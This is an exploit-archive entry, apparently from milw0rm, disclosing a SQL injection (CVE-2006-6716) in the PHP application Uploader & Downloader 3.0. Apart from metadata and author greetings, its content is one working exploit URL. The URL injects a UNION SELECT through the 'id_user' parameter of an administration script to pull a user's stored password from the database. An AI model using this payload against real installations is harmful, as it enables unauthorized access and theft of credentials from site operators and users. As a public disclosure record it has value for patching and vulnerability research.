Uploader & Downloader 3.0 - 'id_user' SQL Injection
Author: the master
type: webapps
platform: php
port:
date_added: 2006-12-17
date_updated:
verified: 1
codes: OSVDB-35837;CVE-2006-6716
tags:
aliases:
screenshot_url:
application_url:
########################################################################
# uploader&downloader v3 Remote SQL Injection Vulnerability
#
# Download: ftp://ftp1.comscripts.com/PHP/1892_uploader-30.zip
#
# Found By: the master
#
########################################################################
# exploit:
#
# http://[Target]/[Path]/administration/administre2.php?id_user=-1%20UNION%20SELECT%20null,passe,null,null%20FROM%20connect_upload_fichier%20WHERE%20id_user=1
#
# Greetz: str0ke , Dr Max Virus , Kacper
########################################################################
# milw0rm.com [2006-12-18]